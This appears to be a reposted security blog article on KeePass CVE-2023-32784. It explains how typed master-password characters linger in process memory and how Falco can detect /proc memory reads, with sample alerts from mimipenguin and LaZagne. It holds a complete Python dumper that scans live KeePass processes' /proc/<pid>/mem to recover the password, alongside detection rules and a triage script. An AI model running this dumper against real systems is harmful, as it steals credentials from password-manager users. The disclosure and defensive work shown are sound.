KeePass CVE-2023-32784: What Is It?




In May 2023, a new security vulnerability affecting KeePass, CVE-2023-32784, was disclosed. KeePass is a popular open-source password manager that runs on Windows and, through Mono, on macOS and Linux. The vulnerability lets an attacker who can read the KeePass process's memory recover the master password in plaintext (all but its first character) and, with it, every credential stored in the database.


We strongly recommend updating to KeePass 2.54 or later, which fixes this vulnerability.

In this article, we explain the new security vulnerability CVE-2023-32784, how it works, and how to detect this kind of attack, in which an attacker who already has full access to your system uses memory-scraping techniques to steal your credentials.

Credentials in Linux Memory
When we talk about credentials on Linux, we usually think of the /etc/shadow file, but it is not the only place passwords live. Many processes hold credentials in memory, and malicious tools try to extract them from there. The /proc filesystem described below is a popular vector for such attacks.

From the Linux kernel documentation: "The /proc directory (among other things) contains one entry for each process running on the system, identified by a process identifier (PID)."

MITRE ATT&CK catalogues adversaries collecting credentials through the proc filesystem as OS Credential Dumping: Proc Filesystem (T1003.007).


What Is KeePass CVE-2023-32784?

CVE-2023-32784 allows the master password to be recovered in plaintext from a memory dump. The dump can be a KeePass process dump, the swap file (pagefile.sys on Windows; a swap partition or swap file on Linux), the hibernation file (hiberfil.sys), or a full system memory dump.

KeePass 2.x uses a custom text box, SecureTextBoxEx, for password entry. The flaw exploited by this CVE is that each time a character is typed, a leftover string is created in memory consisting of the masked prefix followed by the character just typed. Because .NET strings are immutable and managed by the garbage collector, the application cannot reliably overwrite them, so these copies linger in the heap (and in any swap or hibernation file they are paged out to). For example, when typing "Password", the following leftover strings are generated:
•a, ••s, •••s, ••••w, •••••o, ••••••r, •••••••d. Only the first character cannot be recovered, because no masked prefix exists when it is typed.

NOTE: We use Ubuntu 18.04.1 to reproduce the scenario and KeePass 2.38 for Linux. The Proof of Concept (PoC) we use is based on GitHub repositories derived from the original PoC. It extracts the KeePass master password in three steps:

First, it scans all /proc/<pid>/cmdline files and saves the PIDs of those containing the keyword "KeePass".
Then, from /proc/<pid>/maps, it collects the address ranges of memory mappings that are not backed by a library or executable on disk (anonymous mappings, the heap and the stack), because that is where the Mono/.NET managed heap lives.
Finally, it reads each of those ranges from /proc/<pid>/mem into a buffer and searches it for the leftover strings the password box produced as the user typed the master password: •a, ••s, •••s, and so on. Reading another process's /proc/<pid>/mem requires ptrace access to that process, which on a default Ubuntu (Yama ptrace_scope=1) means root.
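The three steps above, implemented in Python as an added example (this is not the PoC the page uses, nor KeePass code). It assumes KeePass masks typed characters with U+25CF BLACK CIRCLE, which the public PoC looks for as the UTF-16LE byte pair CF 25 since .NET strings are UTF-16LE; demo_buffer() is constructed test data standing in for a real memory dump, so the recovery logic can be exercised without a KeePass process or root.

```python
"""Added example, not the PoC the page uses and not KeePass code: the three
/proc steps described above, plus reassembly of the leftover strings.
Assumptions: KeePass masks typed characters with U+25CF (BLACK CIRCLE), which
the public PoC searches for as the UTF-16LE byte pair CF 25; demo_buffer() is
constructed test data. Reading another process's /proc/<pid>/mem needs ptrace
access to it, i.e. root on a default Ubuntu (Yama ptrace_scope=1)."""
import re
import sys
from pathlib import Path

MASK = "\u25cf"                                  # masking character (assumption)
MASK_RUN = re.compile(rb"(?:\xcf\x25)+")          # MASK repeated, as UTF-16LE bytes
MAX_LEN = 64                                     # longer runs are not a typed password
_MAPS_LINE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+\S+\s+\S+\s+\d+\s*(.*)$")


def keepass_pids(proc="/proc"):
    """Step 1: PIDs whose /proc/<pid>/cmdline mentions KeePass."""
    pids = []
    for entry in Path(proc).iterdir():
        if not entry.name.isdigit():
            continue
        try:
            cmdline = (entry / "cmdline").read_bytes()
        except OSError:                          # exited, or not ours to read
            continue
        if b"keepass" in cmdline.lower():
            pids.append(int(entry.name))
    return pids


def anonymous_regions(maps_text):
    """Step 2: readable mappings not backed by a file on disk. A pathname like
    /usr/lib/libmono-2.0.so.1 is a library; an empty or bracketed one ([heap],
    [stack]) is anonymous memory, where the Mono/.NET managed heap lives."""
    regions = []
    for line in maps_text.splitlines():
        m = _MAPS_LINE.match(line)
        if not m:
            continue
        start, end, perms, path = m.groups()
        if "r" not in perms or (path and not path.startswith("[")):
            continue                             # unreadable ([vsyscall]) or file-backed
        regions.append((int(start, 16), int(end, 16)))
    return regions


def read_regions(pid, regions, proc="/proc"):
    """Step 3: copy the selected regions out of /proc/<pid>/mem into one buffer."""
    chunks = []
    with open(f"{proc}/{pid}/mem", "rb", buffering=0) as mem:
        for start, end in regions:
            try:
                mem.seek(start)
                chunks.append(mem.read(end - start))
            except (OSError, OverflowError):     # guard pages, [vvar] and the like
                continue
    return b"".join(chunks)


def recover_candidates(buf):
    """Find every '●…●X' leftover: n masks followed by one printable UTF-16LE
    code unit X means X was the (n+1)-th character typed. Returns
    {position: set_of_chars}; position 0 is never present (nothing is masked
    yet when the first character is typed)."""
    candidates = {}
    for m in MASK_RUN.finditer(buf):
        n = (m.end() - m.start()) // 2
        try:
            ch = buf[m.end():m.end() + 2].decode("utf-16-le")
        except UnicodeDecodeError:               # truncated or lone surrogate
            continue
        if n <= MAX_LEN and len(ch) == 1 and ch.isprintable():
            candidates.setdefault(n, set()).add(ch)
    return candidates


def assemble(candidates):
    """Render as one string: '?' where nothing was found (always position 0),
    braces where several characters were seen at one position (a typo fixed
    with backspace leaves both behind)."""
    if not candidates:
        return ""
    out = ["?"]
    for i in range(1, max(candidates) + 1):
        chars = "".join(sorted(candidates.get(i, ())))
        out.append(chars if len(chars) == 1 else "{%s}" % chars if chars else "?")
    return "".join(out)


def recover_from_pid(pid, proc="/proc"):
    """Steps 2 and 3 plus reassembly against one live process."""
    regions = anonymous_regions(Path(proc, str(pid), "maps").read_text())
    return assemble(recover_candidates(read_regions(pid, regions, proc)))


def leftovers_for(typed):
    """Constructed data: the leftover strings the password box leaves while
    `typed` is entered, encoded as .NET holds them: ●a, ●●s, ●●●s, ..."""
    return [(MASK * i + typed[i]).encode("utf-16-le") for i in range(1, len(typed))]


def demo_buffer(typed="Password"):
    """Constructed fake heap: the leftovers scattered between ASCII filler."""
    filler = b"GC-heap-filler-bytes-0123456789" * 3
    return filler + filler.join(leftovers_for(typed)) + filler


if __name__ == "__main__":                       # --live needs root and a running KeePass
    if "--live" in sys.argv:
        for pid in keepass_pids():
            print(pid, recover_from_pid(pid))
    else:
        print(assemble(recover_candidates(demo_buffer())))
```

Run without arguments it prints `?assword` for the constructed buffer; `--live` performs the real scan. The `assemble` helper also shows why a dump can yield more than one candidate per position: if the user mistyped and backspaced, both characters leave a leftover string at that position.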


The PoC output shows the master password recovered without its first character.

How Do We Detect KeePass CVE-2023-32784?

To detect this kind of attack, we look for an unexpected process reading other processes' entries under /proc. Such a read should raise an alert that can then be investigated.

To detect this with Falco, the CNCF open-source runtime security project that detects anomalous activity on hosts and in cloud-native environments in real time, we can start from the default rule 'Read environment variable from /proc files' or write a new one.

To fire on this PoC, the condition must catch reads of /proc/<pid>/maps and /proc/<pid>/mem, which the PoC uses to locate and dump the KeePass process memory. The PoC also reads /proc/<pid>/cmdline, but so does every ps or top invocation, so alerting on cmdline reads would be far too noisy to be useful.

Code:
- rule: Dump memory detection
  desc: >
    An attempt to read another process's memory layout or contents through
    /proc/<pid>/maps or /proc/<pid>/mem, as credential-dumping tools do
  condition: >
    open_read and (fd.name glob "/proc/*/mem" or fd.name glob "/proc/*/maps")
  output: >
    Detected process memory dump to search for credentials (proc.name=%proc.name proc.pname=%proc.pname fd.name=%fd.name container=%container.info evt.type=%evt.type evt.arg.request=%evt.arg.request proc.pid=%proc.pid proc.cwd=%proc.cwd proc.ppid=%proc.ppid proc.cmdline=%proc.cmdline proc.pcmdline=%proc.pcmdline)
  priority: WARNING
  tags: [host, container, process, mitre_credential_access, T1003.007]

With this new rule, we can detect the exploitation of CVE-2023-32784. Two practical notes: the rule relies on the open_read macro from Falco's default rules file, so load it alongside falco_rules.yaml; and the default 'Read environment variable' rule includes the container macro, which restricts it to processes running in containers. In this demo KeePass and the dumper run directly on the host (the alert shows container=host), so that macro must be left out. Expect legitimate debuggers such as gdb, and processes reading their own /proc/self/maps, to trigger it too; tune with an allowlist rather than loosening the path match.


The alert contains all the information needed to further investigate the threat.



Code:
10:47:47.232147057: Warning Detected process memory dump to search for credentials (proc.name=dump proc.pname=sudo fd.name=/proc/2859/mem container=host (id=host) evt.type=openat evt.arg.request=<NA> proc.pid=2916 proc.cwd=/home/kpdemo/CVE-2023-32784-keepass-linux/ proc.ppid=2915 proc.cmdline=dump proc.pcmdline=sudo ./dump gparent=bash ggparent=gnome-terminal- gggparent=systemd proc.sid=2802 proc.exepath=/home/kpdemo/CVE-2023-32784-keepass-linux/dump user.uid=0 user.loginuid=1000 user.loginname=kpdemo user.name=root group.gid=0 group.name=root container.id=host container.name=host image=<NA>)

As noted in the exploitation section, an attacker with sufficient privileges on the machine can do anything, including reading process memory, and this rule does not prevent that. What it does give us is the knowledge that a credential-dumping attempt took place, so we can treat the stored credentials as compromised, rotate them, and investigate the reader process and the person behind it (the alert above records user.uid=0 because of sudo, but user.loginuid=1000 and user.loginname=kpdemo identify the real user).
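Parsing and triaging these alerts as an added example, not Falco's or the page's code. The two memory-dump alert lines in SAMPLE_ALERTS are copied from this page; the third is a constructed benign line in which a process reads its own /proc/self/maps, and ALLOWED_READERS is a hypothetical allowlist. The code separates cross-process reads of /proc/<pid>/{mem,maps} (the credential-dumping pattern) from a process reading its own /proc entry, and pulls out the login user rather than the effective root of sudo.

```python
"""Added example (not Falco's code): triage of Falco text alerts from the
Dump memory detection rule. Parses the key=value body, extracts which PID's
/proc/<pid>/{mem,maps} was opened, and classifies the read. SAMPLE_ALERTS
holds the two alerts shown on this page plus one constructed benign line;
ALLOWED_READERS is a hypothetical allowlist."""
import re

# "<time>: <Priority> <message> (k=v k=v ...)", Falco's default text output
_HEADER = re.compile(r"^(\S+): (\w+) (.*?) \((.*)\)$")
# a value runs until the next " key=" token or the end of the body, so values
# containing spaces ("sudo ./dump", "host (id=host)") survive intact
_FIELD = re.compile(r"([A-Za-z_.]+)=(.*?)(?=\s+[A-Za-z_.]+=|$)")
_PROC_TARGET = re.compile(r"^/proc/(\d+|self)/(?:task/\d+/)?(mem|maps)$")

ALLOWED_READERS = {"gdb", "strace"}              # hypothetical: known debuggers

SAMPLE_ALERTS = [
    # the two alerts from the page: the dump PoC and mimipenguin
    "10:47:47.232147057: Warning Detected process memory dump to search for credentials (proc.name=dump proc.pname=sudo fd.name=/proc/2859/mem container=host (id=host) evt.type=openat evt.arg.request=<NA> proc.pid=2916 proc.cwd=/home/kpdemo/CVE-2023-32784-keepass-linux/ proc.ppid=2915 proc.cmdline=dump proc.pcmdline=sudo ./dump gparent=bash ggparent=gnome-terminal- gggparent=systemd proc.sid=2802 proc.exepath=/home/kpdemo/CVE-2023-32784-keepass-linux/dump user.uid=0 user.loginuid=1000 user.loginname=kpdemo user.name=root group.gid=0 group.name=root container.id=host container.name=host image=<NA>)",
    "10:56:59.508184318: Warning Detected process memory dump to search for credentials (proc.name=python proc.pname=sudo fd.name=/proc/1114/mem container=host (id=host) evt.type=openat evt.arg.request=<NA> proc.pid=7194 proc.cwd=/home/kpdemo/mimipenguin/ proc.ppid=7193 proc.cmdline=python mimipenguin.py proc.pcmdline=sudo python mimipenguin.py gparent=bash ggparent=gnome-terminal- gggparent=systemd proc.sid=2802 proc.exepath=/usr/bin/python user.uid=0 user.loginuid=1000 user.loginname=kpdemo user.name=root group.gid=0 group.name=root container.id=host container.name=host image=<NA>)",
    # constructed: a process reading its own maps, not another PID's memory
    "11:20:03.000000000: Warning Detected process memory dump to search for credentials (proc.name=python proc.pname=bash fd.name=/proc/self/maps container=host (id=host) evt.type=openat evt.arg.request=<NA> proc.pid=8001 proc.cwd=/home/kpdemo/ proc.ppid=7990 proc.cmdline=python app.py proc.pcmdline=bash gparent=gnome-terminal- ggparent=systemd gggparent=<NA> proc.sid=2802 proc.exepath=/usr/bin/python user.uid=1000 user.loginuid=1000 user.loginname=kpdemo user.name=kpdemo group.gid=1000 group.name=kpdemo container.id=host container.name=host image=<NA>)",
]


def parse_alert(line):
    """Split one text alert into a dict of its fields plus time/priority/message."""
    m = _HEADER.match(line.strip())
    if not m:
        return None
    ts, priority, message, body = m.groups()
    fields = dict(_FIELD.findall(body))
    fields.update(time=ts, priority=priority, message=message)
    return fields


def triage(fields):
    """Classify one parsed alert and pull out what an analyst needs first."""
    target = _PROC_TARGET.match(fields.get("fd.name", ""))
    if target is None:
        verdict, target_pid = "other", None      # not a /proc mem/maps read
    else:
        target_pid, _ = target.groups()
        if fields.get("proc.name") in ALLOWED_READERS:
            verdict = "allowlisted"
        elif target_pid == "self" or target_pid == fields.get("proc.pid"):
            verdict = "self_read"                # own entry: common, low value alone
        else:
            verdict = "cross_process"            # another PID's memory: investigate
    return {
        "verdict": verdict,
        "target_pid": target_pid,
        "reader": fields.get("proc.cmdline"),
        "via": fields.get("proc.pcmdline"),        # e.g. the sudo wrapper
        "real_user": fields.get("user.loginname"),  # who ran sudo, not "root"
        "time": fields.get("time"),
    }


def triage_all(lines):
    """Parse and triage a batch of alert lines, skipping anything unparseable."""
    return [triage(f) for f in map(parse_alert, lines) if f is not None]


if __name__ == "__main__":
    for row in triage_all(SAMPLE_ALERTS):
        print(row)
```

The key=value body is not whitespace-safe (proc.pcmdline and container.info contain spaces), which is why the field regex splits on the next `key=` token rather than on spaces; in production, Falco's JSON output (`json_output: true`) avoids the problem entirely and is the better feed for a SIEM.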

More Tools for Memory Dump

Digging a bit deeper into this technique, we find other tools that work the same way. Let's look at a few and check that the rule detects them too.

Mimipenguin

Mimipenguin 2.0 is a tool that dumps the login password of the current Linux desktop user from process memory. It is modelled on the idea behind Mimikatz, the popular Windows credential theft tool.



This tool attempts something similar to the KeePass PoC, but it does not search for the KeePass leftover strings, so it does not recover the master key; it does, however, recover system credentials. It triggers two alerts. The first is our memory dump rule, fired when it reads /proc/<pid>/mem:


Code:
10:56:59.508184318: Warning Detected process memory dump to search for credentials (proc.name=python proc.pname=sudo fd.name=/proc/1114/mem container=host (id=host) evt.type=openat evt.arg.request=<NA> proc.pid=7194 proc.cwd=/home/kpdemo/mimipenguin/ proc.ppid=7193 proc.cmdline=python mimipenguin.py proc.pcmdline=sudo python mimipenguin.py gparent=bash ggparent=gnome-terminal- gggparent=systemd proc.sid=2802 proc.exepath=/usr/bin/python user.uid=0 user.loginuid=1000 user.loginname=kpdemo user.name=root group.gid=0 group.name=root container.id=host container.name=host image=<NA>)

The second is Falco's default 'Sensitive file opened for reading by non-trusted program' rule, fired when the tool reads /etc/shadow; mimipenguin checks the password candidates it scraped from memory against the hashes stored there.

Code:
10:57:52.447428441: Warning Sensitive file opened for reading by non-trusted program (user=root user_loginuid=1000 program=python command=python mimipenguin.py pid=7194 file=/etc/shadow parent=sudo gparent=bash ggparent=gnome-terminal- gggparent=systemd container_id=host image=<NA>)

LaZagne

The LaZagne project is an open-source application that retrieves many passwords stored on a local computer. It is not limited to memory: it also searches for credentials with other techniques (plaintext files, APIs, custom algorithms, databases, etc.).




In this example our rule fires again, this time on the read of /proc/<pid>/maps, and LaZagne's own output shows that it found the user's password and the KeePass database we saved.


Code:
11:14:02.074516511: Warning Detected process memory dump to search for credentials (proc.name=python proc.pname=sudo fd.name=/proc/1114/maps container=host (id=host) evt.type=openat evt.arg.request=<NA> proc.pid=7253 proc.cwd=/home/kpdemo/LaZagne/Linux/ proc.ppid=7252 proc.cmdline=python laZagne.py all proc.pcmdline=sudo python laZagne.py all gparent=bash ggparent=gnome-terminal- gggparent=systemd proc.sid=2802 proc.exepath=/usr/bin/python user.uid=0 user.loginuid=1000 user.loginname=kpdemo user.name=root group.gid=0 group.name=root container.id=host container.name=host image=<NA>)

Lessons Learned

Collecting credentials is a very common attacker technique. It is essential to have the tooling to detect it, so that stolen credentials cannot be used to move laterally or reach other services.

Falco provides a final layer of defence: it lets us monitor access to sensitive process data such as /proc/<pid>/mem and alert on this malicious behaviour.

Finally, we strongly recommend updating to KeePass 2.54 or later.

Source : https://www.turkhackteam.org/konular/keepass-cve-2023-32784-nedir.2047567/
 